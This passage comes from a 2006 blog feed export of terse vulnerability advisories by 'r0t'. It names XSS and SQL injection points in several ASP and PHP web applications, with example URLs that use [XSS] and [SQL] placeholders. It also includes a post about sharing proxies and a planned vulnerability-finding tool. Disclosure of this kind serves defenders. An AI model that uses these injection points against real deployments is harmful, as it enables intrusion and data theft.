href='http://pridels0.blogspot.com/2006/06/ezgallery-v15-xss-vuln.html' title='EZGallery &lt;= v1.5 XSS vuln.'/><author><name>r0t</name><uri>http://www.blogger.com/profile/08921451354908857908</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-15362515.post-114985975019651566</id><published>2006-06-09T15:28:00.000+02:00</published><updated>2007-02-25T05:50:46.706+01:00</updated><title type='text'>My Photo Scrapbook vuln.</title><content type='html'>###############################################&lt;br /&gt;Vuln. discovered by : r0t&lt;br /&gt;Date: 9 june 2006&lt;br /&gt;vendor:&lt;br /&gt;www.esoftwaresite.com/aspscripts/scrapbook/marketing/main.htm&lt;br /&gt;affected versions: 1.0 and prior&lt;br /&gt;###############################################&lt;br /&gt;&lt;br /&gt;Vuln. Description:&lt;br /&gt;&lt;br /&gt;1.&lt;br /&gt;My Photo Scrapbook contains a flaw that allows a remote Cross-Site Scripting attacks.Input passed to the "key_m" parameter in "display.asp" isn't properly sanitised before being returned to the user.&lt;br /&gt;This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.&lt;br /&gt;&lt;br /&gt;2.&lt;br /&gt;Input passed to the "key" parameter in "Displayview.asp" and "Details_Photo_bv.asp" isn't properly sanitised before being used in a SQL query.&lt;br /&gt;This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;###############################################&lt;br /&gt;Solution:&lt;br /&gt;Edit the source code to ensure that input is properly sanitised.&lt;br /&gt;###############################################&lt;br /&gt;More information @ unsecured-systems.com/forum/&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/15362515-114985975019651566?l=pridels0.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://pridels0.blogspot.com/feeds/114985975019651566/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=15362515&amp;postID=114985975019651566' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/15362515/posts/default/114985975019651566'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/15362515/posts/default/114985975019651566'/><link rel='alternate' type='text/html' href='http://pridels0.blogspot.com/2006/06/my-photo-scrapbook-vuln.html' title='My Photo Scrapbook vuln.'/><author><name>r0t</name><uri>http://www.blogger.com/profile/08921451354908857908</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-15362515.post-114985700416711780</id><published>2006-06-09T14:42:00.000+02:00</published><updated>2006-06-09T14:43:24.300+02:00</updated><title type='text'>ASP ListPics &lt;=4.3 XSS vuln.</title><content type='html'>###############################################&lt;br /&gt;Vuln. discovered by : r0t&lt;br /&gt;Date: 9 june 2006&lt;br /&gt;vendor:http://www.iisworks.com/listpics/&lt;br /&gt;affected versions: 4.3 and prior&lt;br /&gt;###############################################&lt;br /&gt;&lt;br /&gt;Vuln. Description:&lt;br /&gt;&lt;br /&gt;ASP ListPics contains a flaw that allows a remote Cross-Site Scripting attacks.Input passed to the "Info" parameter in "listpics.asp" isn't properly sanitised before being returned to the user.&lt;br /&gt;This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.&lt;br /&gt;&lt;br /&gt;example:&lt;br /&gt;&lt;br /&gt;/listpics.asp?a=rate&amp;ID=1&amp;Info=[XSS]&lt;br /&gt;&lt;br /&gt;###############################################&lt;br /&gt;Solution:&lt;br /&gt;Edit the source code to ensure that input is properly sanitised.&lt;br /&gt;###############################################&lt;br /&gt;More information @ unsecured-systems.com/forum/&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/15362515-114985700416711780?l=pridels0.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://pridels0.blogspot.com/feeds/114985700416711780/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=15362515&amp;postID=114985700416711780' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/15362515/posts/default/114985700416711780'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/15362515/posts/default/114985700416711780'/><link rel='alternate' type='text/html' href='http://pridels0.blogspot.com/2006/06/asp-listpics-43-xss-vuln.html' title='ASP ListPics &lt;=4.3 XSS vuln.'/><author><name>r0t</name><uri>http://www.blogger.com/profile/08921451354908857908</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-15362515.post-114985624942044707</id><published>2006-06-09T14:29:00.000+02:00</published><updated>2006-06-09T14:30:56.543+02:00</updated><title type='text'>KAPhotoservice  &lt;=7.5 vuln.</title><content type='html'>###############################################&lt;br /&gt;Vuln. discovered by : r0t&lt;br /&gt;Date: 9 june 2006&lt;br /&gt;vendor:http://www.kaphotoservice.com/&lt;br /&gt;affected versions: 7.5 and prior&lt;br /&gt;###############################################&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Vuln. Description:&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;1.  Script Insertion attack vuln. &lt;br /&gt;&lt;br /&gt;KAPhotoservice contains a flaw that allows a remote script insertion attacks.Input supplied to the "New Category" parameter in  "edtalbum.asp" isn't properly sanitised before being used. This can be exploited to insert arbitrary script code, which will be executed in a user's browser session in context of an affected site when malicious data is viewed.&lt;br /&gt; &lt;br /&gt;&lt;br /&gt;&lt;br /&gt;2. Cross-Site Scripting attack vuln.&lt;br /&gt;&lt;br /&gt;KAPhotoservice contains a flaw that allows a remote Cross-Site Scripting attacks.Input passed to the "cat","albumid" parameter in "album.asp" and input passed to the "apage" parameter in "edtalbum.asp" isn't properly sanitised before being returned to the user.&lt;br /&gt;This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.&lt;br /&gt;&lt;br /&gt;examples:&lt;br /&gt;&lt;br /&gt;/album.asp?cat=[XSS]&amp;albumid=1&lt;br /&gt;/albums.asp?cat=&amp;albumid=[XSS]&lt;br /&gt;/edtalbum.asp?cat=&amp;albumid=1&amp;apage=[XSS]&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;note for developer: &lt;br /&gt;my checking results you become via report module at your software,but its only those where is possible SQL injection. &lt;br /&gt;&lt;br /&gt;###############################################&lt;br /&gt;Solution:&lt;br /&gt;Edit the source code to ensure that input is properly sanitised.&lt;br /&gt;###############################################&lt;br /&gt;More information @ unsecured-systems.com/forum/&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/15362515-114985624942044707?l=pridels0.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://pridels0.blogspot.com/feeds/114985624942044707/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=15362515&amp;postID=114985624942044707' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/15362515/posts/default/114985624942044707'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/15362515/posts/default/114985624942044707'/><link rel='alternate' type='text/html' href='http://pridels0.blogspot.com/2006/06/kaphotoservice-75-vuln.html' title='KAPhotoservice  &lt;=7.5 vuln.'/><author><name>r0t</name><uri>http://www.blogger.com/profile/08921451354908857908</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-15362515.post-114985179432446634</id><published>2006-06-09T13:15:00.000+02:00</published><updated>2007-04-14T10:56:35.870+02:00</updated><title type='text'>VanillaSoft Helpdesk XSS vuln.</title><content type='html'>###############################################&lt;br /&gt;Vuln. discovered by : r0t&lt;br /&gt;Date: 9 june 2006&lt;br /&gt;vendor:http://www.vanillasoft.ch/en/&lt;br /&gt;affected versions:Version 2005 and prior&lt;br /&gt;###############################################&lt;br /&gt;&lt;br /&gt;Vuln. Description:&lt;br /&gt;&lt;br /&gt;VanillaSoft Helpdesk contains a flaw that allows a remote Cross-Site Scripting attacks.Input passed to the "username" parameter in "default.asp" isn't properly sanitised before being returned to the user.&lt;br /&gt;This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.&lt;br /&gt;&lt;br /&gt;###############################################&lt;br /&gt;Solution:&lt;br /&gt;Edit the source code to ensure that input is properly sanitised.&lt;br /&gt;###############################################&lt;br /&gt;More information @ unsecured-systems.com/forum/&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/15362515-114985179432446634?l=pridels0.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://pridels0.blogspot.com/feeds/114985179432446634/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=15362515&amp;postID=114985179432446634' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/15362515/posts/default/114985179432446634'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/15362515/posts/default/114985179432446634'/><link rel='alternate' type='text/html' href='http://pridels0.blogspot.com/2006/06/vanillasoft-helpdesk-xss-vuln.html' title='VanillaSoft Helpdesk XSS vuln.'/><author><name>r0t</name><uri>http://www.blogger.com/profile/08921451354908857908</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-15362515.post-114985074955216086</id><published>2006-06-09T12:58:00.000+02:00</published><updated>2006-06-09T12:59:28.990+02:00</updated><title type='text'>OfficeFlow &lt;=2.6 vuln.</title><content type='html'>###############################################&lt;br /&gt;Vuln. discovered by : r0t&lt;br /&gt;Date: 9 june 2006&lt;br /&gt;vendor:http://www.asptools.biz/officeflow.asp&lt;br /&gt;affected versions:2.6 and prior&lt;br /&gt;###############################################&lt;br /&gt;&lt;br /&gt;Vuln. Description:&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;1. Cross-Site Scripting attack vuln.&lt;br /&gt;&lt;br /&gt;OfficeFlow contains a flaw that allows a remote Cross-Site Scripting attacks.Input passed to the "sqlType" parameter in "default.asp" isn't properly sanitised before being returned to the user.&lt;br /&gt;This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;2. SQL injection attack vuln.&lt;br /&gt;&lt;br /&gt;OfficeFlow contains a flaw that allows a remote sql injection attacks.Input passed to the "Project" parameter in "files.asp" isn't properly sanitised before being used in a SQL query.&lt;br /&gt;This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;###############################################&lt;br /&gt;Solution:&lt;br /&gt;Edit the source code to ensure that input is properly sanitised.&lt;br /&gt;###############################################&lt;br /&gt;More information @ unsecured-systems.com/forum/&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/15362515-114985074955216086?l=pridels0.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://pridels0.blogspot.com/feeds/114985074955216086/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=15362515&amp;postID=114985074955216086' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/15362515/posts/default/114985074955216086'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/15362515/posts/default/114985074955216086'/><link rel='alternate' type='text/html' href='http://pridels0.blogspot.com/2006/06/officeflow-26-vuln.html' title='OfficeFlow &lt;=2.6 vuln.'/><author><name>r0t</name><uri>http://www.blogger.com/profile/08921451354908857908</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-15362515.post-114969028933591146</id><published>2006-06-07T16:17:00.000+02:00</published><updated>2006-06-07T16:49:26.556+02:00</updated><title type='text'>about general</title><content type='html'>I decided that blog isnt best place to continue publishing proxies&amp;socks , cauz its take too much place in your view. &lt;br /&gt;Proxies&amp;socks start yesterday are published on our board . &lt;br /&gt;I will try to contribute daily ,but how long i dont know .&lt;br /&gt;&lt;br /&gt;OK. &lt;br /&gt;Other point that i second time heard that i am in some other places one was Security Castle and other one some turkish hackers board . &lt;br /&gt;I dont know who are those persons , but thats not me .. me you can meet only here or on our board .&lt;br /&gt;&lt;br /&gt;About Crew ,&lt;br /&gt;cembo will make SQL&amp;XSS tool, that will help lazy guys to discover vulns. &lt;br /&gt;And PMB new realese also will come soon . &lt;br /&gt;As i already told FrozenEye, i will write a simple tut how to discover SQL/XSS vulns on webaplications and other nianses in that case. My tut will not open new america its already said/wroten by many people, it will be just from other view or my view. &lt;br /&gt;We are working also for other stuff , when we come closer to complete results ...than you will know more. &lt;br /&gt;Hm... i said almost all what i wanted to say, just... i dont like situation wich we have on board ... its about mods. I already now discuz with some people about that.. have some candidates ,but im not sure and they arent sure that we can work together , so its actual that we need mods, so if you think you are right person or you wanna be that person , go to our board and speak with guys or with me.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/15362515-114969028933591146?l=pridels0.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://pridels0.blogspot.com/feeds/114969028933591146/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=15362515&amp;postID=114969028933591146' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/15362515/posts/default/114969028933591146'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/15362515/posts/default/114969028933591146'/><link rel='alternate' type='text/html' href='http://pridels0.blogspot.com/2006/06/about-general.html' title='about general'/><author><name>r0t</name><uri>http://www.blogger.com/profile/08921451354908857908</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-15362515.post-114960194303529208</id><published>2006-06-06T15:51:00.000+02:00</published><updated>2007-02-19T11:59:33.303+01:00</updated><title type='text'>OBM Multiple SQL inj. and XSS vuln.</title><content type='html'>###############################################&lt;br /&gt;Vuln. discovered by : r0t&lt;br /&gt;Date: 6 june 2006&lt;br /&gt;vendor:http://obm.aliacom.fr/&lt;br /&gt;affected versions:&lt;br /&gt;tested on 1.0.3pl1 version.&lt;br /&gt;other versions also can be affected.&lt;br /&gt;###############################################&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Vuln. Description:&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;1. Multiple SQL injection vuln.&lt;br /&gt;&lt;br /&gt;OBM contains a flaw that allows a remote sql injection attacks.Input passed to the "new_order" and "order_dir" parameter in&lt;br /&gt;"group/group_index.php","user/user_index.php",&lt;br /&gt;"list/list_index.php","company/company_index.php" isn't properly sanitised before being used in a SQL query.&lt;br /&gt;This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;2.Multiple Cross-Site Scripting attack vuln.&lt;br /&gt;&lt;br /&gt;OBM contains a flaw that allows a remote Cross-Site Scripting attacks.Input passed to the "tf_lang","tf_name","tf_user","tf_lastname",&lt;br /&gt;"tf_contact","tf_datebefore","tf_dateafter" parameter in certain files isn't properly sanitised before being returned to the user.&lt;br /&gt;This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Some examples:&lt;br /&gt;&lt;br /&gt;http://obm-host/publication/publication_index.php?&lt;br /&gt;tf_title=&amp;sel_type=_ALL_&amp;tf_year=&amp;tf_lang=[XSS]&lt;br /&gt;&lt;br /&gt;http://obm-host/group/group_index.php?action=sear&lt;br /&gt;ch&amp;tf_name=[XSS]&lt;br /&gt;&lt;br /&gt;http://obm-host/group/group_index.php?action=sear&lt;br /&gt;ch&amp;tf_name=&amp;tf_user=[XSS]&lt;br /&gt;&lt;br /&gt;http://obm-host/user/user_index.php?action=search&lt;br /&gt;&amp;tf_login=&amp;tf_lastname=[XSS]&lt;br /&gt;&lt;br /&gt;http://obm-host/list/list_index.php?action=search&lt;br /&gt;&amp;tf_name=[XSS]&lt;br /&gt;&lt;br /&gt;http://obm-host/list/list_index.php?action=search&lt;br /&gt;&amp;tf_name=&amp;tf_contact=[XSS]&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;http://obm-host/group/group_index.php?action=sear&lt;br /&gt;ch&amp;tf_name=&amp;tf_user=&amp;page=&amp;new_order=[SQL]&lt;br /&gt;&lt;br /&gt;http://obm-host/group/group_index.php?action=sear&lt;br /&gt;ch&amp;tf_name=&amp;tf_user=&amp;page=&amp;new_order=group_email&lt;br /&gt;&amp;order_dir=[SQL]&lt;br /&gt;&lt;br /&gt;http://obm-host/?action=search&amp;tf_login=&amp;tf_last&lt;br /&gt;name=&amp;sel_perms=&amp;tf_email=&amp;tf_desc=&amp;tf_group=&amp;cb&lt;br /&gt;_archive=&amp;page=&amp;new_order=[SQL]&lt;br /&gt;&lt;br /&gt;http://obm-host/user/user_index.php?action=searc&lt;br /&gt;h&amp;tf_login=&amp;tf_lastname=&amp;sel_perms=&amp;tf_email=&amp;tf&lt;br /&gt;_desc=&amp;tf_group=&amp;cb_archive=&amp;page=&amp;new_order=use&lt;br /&gt;robm_lastname&amp;order_dir=[SQL]&lt;br /&gt;&lt;br /&gt;http://obm-host/list/list_index.php?action=sear&lt;br /&gt;ch&amp;tf_name=&amp;tf_contact=&amp;sel_market=&amp;page=&amp;new_o&lt;br /&gt;rder=list_subject&amp;order_dir=[SQL]&lt;br /&gt;&lt;br /&gt;http://obm-host/list/list_index.php?action=searc&lt;br /&gt;h&amp;tf_name=&amp;tf_contact=&amp;sel_market=&amp;page=&amp;new_or&lt;br /&gt;der=[SQL]&lt;br /&gt;&lt;br /&gt;http://obm-host/company/company_index.php?action&lt;br /&gt;=search&amp;tf_name=&amp;tf_phone=&amp;sel_kind=&amp;sel_cat=&amp;tf&lt;br /&gt;_cat_code=&amp;cb_cat_tree=&amp;sel_act=&amp;sel_naf=&amp;tf_zip&lt;br /&gt;=&amp;cb_archive=&amp;sel_market=&amp;tf_town=&amp;sel_ctry=&amp;sel&lt;br /&gt;_dsrc=&amp;tf_dateafter=&amp;tf_datebefore=[XSS]&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;http://obm-host/company/company_index.php?action&lt;br /&gt;=search&amp;tf_name=&amp;tf_phone=&amp;sel_kind=&amp;sel_cat=&amp;tf&lt;br /&gt;_cat_code=&amp;cb_cat_tree=&amp;sel_act=&amp;sel_naf=&amp;tf_zip&lt;br /&gt;=&amp;cb_archive=&amp;sel_market=&amp;tf_town=&amp;sel_ctry=&amp;sel&lt;br /&gt;_dsrc=&amp;tf_dateafter=&amp;tf_datebefore=&amp;page=&amp;new_or&lt;br /&gt;der=company_vat&amp;order_dir=DESC&amp;entity=[SQL]&lt;br /&gt;&lt;br /&gt;http://obm-host/company/company_index.php?action&lt;br /&gt;=search&amp;tf_name=&amp;tf_phone=&amp;sel_kind=&amp;sel_cat=&amp;tf&lt;br /&gt;_cat_code=&amp;cb_cat_tree=&amp;sel_act=&amp;sel_naf=&amp;tf_zip&lt;br /&gt;=&amp;cb_archive=&amp;sel_market=&amp;tf_town=&amp;sel_ctry=&amp;sel&lt;br /&gt;_dsrc=&amp;tf_dateafter=&amp;tf_datebefore=&amp;page=&amp;new_or&lt;br /&gt;der=company_vat&amp;order_dir=[SQL]&lt;br /&gt;&lt;br /&gt;http://obm-host/company/company_index.php?action&lt;br /&gt;=search&amp;tf_name=&amp;tf_phone=&amp;sel_kind=&amp;sel_cat=&amp;tf&lt;br /&gt;_cat_code=&amp;cb_cat_tree=&amp;sel_act=&amp;sel_naf=&amp;tf_zip&lt;br /&gt;=&amp;cb_archive=&amp;sel_market=&amp;tf_town=&amp;sel_ctry=&amp;sel&lt;br /&gt;_dsrc=&amp;tf_dateafter=&amp;tf_datebefore=&amp;page=&amp;new_or&lt;br /&gt;der=[SQL]&lt;br /&gt;&lt;br /&gt;http://obm-host/company/company_index.php?action&lt;br /&gt;=search&amp;tf_name=&amp;tf_phone=&amp;sel_kind=&amp;sel_cat=&amp;tf&lt;br /&gt;_cat_code=&amp;cb_cat_tree=&amp;sel_act=&amp;sel_naf=&amp;tf_zip&lt;br /&gt;=&amp;cb_archive=&amp;sel_market=&amp;tf_town=&amp;sel_ctry=&amp;sel&lt;br /&gt;_dsrc=&amp;tf_dateafter=[SQL]&lt;br /&gt;&lt;br /&gt;http://obm-host/company/company_index.php?action&lt;br /&gt;=search&amp;tf_name=&amp;tf_phone=&amp;sel_kind=&amp;sel_cat=&amp;tf&lt;br /&gt;_cat_code=&amp;cb_cat_tree=&amp;sel_act=&amp;sel_naf=&amp;tf_zip&lt;br /&gt;=&amp;cb_archive=&amp;sel_market=&amp;tf_town=&amp;sel_ctry=&amp;sel&lt;br /&gt;_dsrc=&amp;tf_dateafter=[XSS]&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;###############################################&lt;br /&gt;Solution:&lt;br /&gt;Edit the source code to ensure that input is properly sanitised.&lt;br /&gt;###############################################&lt;br /&gt;More information @ unsecured-systems.com/forum/&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/15362515-114960194303529208?l=pridels0.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://pridels0.blogspot.com/feeds/114960194303529208/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=15362515&amp;postID=114960194303529208' title='1 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/15362515/posts/default/114960194303529208'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/15362515/posts/default/114960194303529208'/><link rel='alternate' type='text/html' href='http://pridels0.blogspot.com/2006/06/obm-multiple-sql-inj-and-xss-vuln.html' title='OBM Multiple SQL inj. and XSS vuln.'/><author><name>r0t</name><uri>http://www.blogger.com/profile/08921451354908857908</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-15362515.post-114959778295732218</id><published>2006-06-06T14:42:00.000+02:00</published><updated>2007-02-27T01:59:07.770+01:00</updated><title type='text'>KnowledgeTree Open Source XSS vuln.</title><content type='html'>###############################################&lt;br /&gt;Vuln. discovered by : r0t&lt;br /&gt;Date: 6 june 2006&lt;br /&gt;vendor:www.ktdms.com/products/knowledgetree&lt;br /&gt;affected versions:3.0.3 and prior&lt;br /&gt;###############################################&lt;br /&gt;&lt;br /&gt;Vuln. Description:&lt;br /&gt;&lt;br /&gt;KnowledgeTree contains a flaw that allows a remote Cross-Site Scripting attacks.Input passed to the "fDocumentId" parameter in "view.php" and input passed to the "fSearchableText" parameter in "/search/simpleSearch.php" isn't properly sanitised before being returned to the user.&lt;br /&gt;This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.&lt;br /&gt;&lt;br /&gt;Also attacker will get full installisations path with error message while testing "fDocumentId"  parameter in "view.php".&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;###############################################&lt;br /&gt;Solution:&lt;br /&gt;Edit the source code to ensure that input is properly sanitised.&lt;br /&gt;###############################################&lt;br /&gt;More information @ unsecured-systems.com/forum/&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/15362515-114959778295732218?l=pridels0.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://pridels0.blogspot.com/feeds/114959778295732218/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=15362515&amp;postID=114959778295732218' title='1 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/15362515/posts/default/114959778295732218'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/15362515/posts/default/114959778295732218'/><link rel='alternate' type='text/html' href='http://pridels0.blogspot.com/2006/06/knowledgetree-open-source-xss-vuln.html' title='KnowledgeTree Open Source XSS vuln.'/><author><name>r0t</name><uri>http://www.blogger.com/profile/08921451354908857908</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-15362515.post-114959201774737119</id><published>2006-06-06T13:06:00.000+02:00</published><updated>2006-07-28T10:39:34.146+02:00</updated><title type='text'>SquirrelMail &lt;=1.5.1 XSS vuln.</title><content type='html'>###############################################&lt;br /&gt;Vuln. discovered by : r0t&lt;br /&gt;Date: 6 june 2006&lt;br /&gt;vendor:http://www.squirrelmail.org/&lt;br /&gt;affected versions:&lt;br /&gt;1.4.6-20060409 latest stable &lt;br /&gt;1.4.7[CVS]&lt;br /&gt;1.5.1-20060409 Development Version&lt;br /&gt;and prior versions also can be affected&lt;br /&gt;###############################################&lt;br /&gt;&lt;br /&gt;Vuln. Description:&lt;br /&gt;&lt;br /&gt;SquirrelMail contains a flaw that allows a remote Cross-Site Scripting attacks.Input passed to the "mailbox" parameter in "search.php" isn't properly sanitised before being returned to the user.&lt;br /&gt;This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.&lt;br /&gt;&lt;br /&gt;###############################################&lt;br /&gt;Solution:&lt;br /&gt;Edit the source code to ensure that input is properly sanitised.&lt;br /&gt;###############################################&lt;br /&gt;More information @ unsecured-systems.com/forum/&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/15362515-114959201774737119?l=pridels0.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://pridels0.blogspot.com/feeds/114959201774737119/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=15362515&amp;postID=114959201774737119' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/15362515/posts/default/114959201774737119'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/15362515/posts/default/114959201774737119'/><link rel='alternate' type='text/html' href='http://pridels0.blogspot.com/2006/06/squirrelmail-151-xss-vuln.html' title='SquirrelMail &lt;=1.5.1 XSS vuln.'/><author><name>r0t</name><uri>http://www.blogger.com/profile/08921451354908857908</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-15362515.post-114948899917784726</id><published>2006-06-05T08:29:00.000+02:00</published><updated>2006-06-05T08:29:59.480+02:00</updated><title type='text'>LabWiki XSS vuln.</title><content type='html'>###############################################&lt;br /&gt;Vuln. discovered by : r0t&lt;br /&gt;Date: 5 june 2006&lt;br /&gt;vendor:www.bioinformatics.org/phplabware/labwiki/&lt;br /&gt;affected versions:1.0 and prior&lt;br /&gt;###############################################&lt;br /&gt;&lt;br /&gt;Vuln. Description:&lt;br /&gt;&lt;br /&gt;LabWiki contains a flaw that allows a remote Cross-Site Scripting attacks.Input passed to the "help" parameter in "recentchanges.php" isn't properly sanitised before being returned to the user. &lt;br /&gt;This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.&lt;br /&gt;&lt;br /&gt;###############################################&lt;br /&gt;Solution:&lt;br /&gt;Edit the source code to ensure that input is properly sanitised.&lt;br /&gt;###############################################&lt;br /&gt;More information @ unsecured-systems.com/forum/&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/15362515-114948899917784726?l=pridels0.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://pridels0.blogspot.com/feeds/114948899917784726/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=15362515&amp;postID=114948899917784726' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/15362515/posts/default/114948899917784726'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/15362515/posts/default/114948899917784726'/><link rel='alternate' type='text/html' href='http://pridels0.blogspot.com/2006/06/labwiki-xss-vuln.html' title='LabWiki XSS vuln.'/><author><name>r0t</name><uri>http://www.blogger.com/profile/08921451354908857908</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' 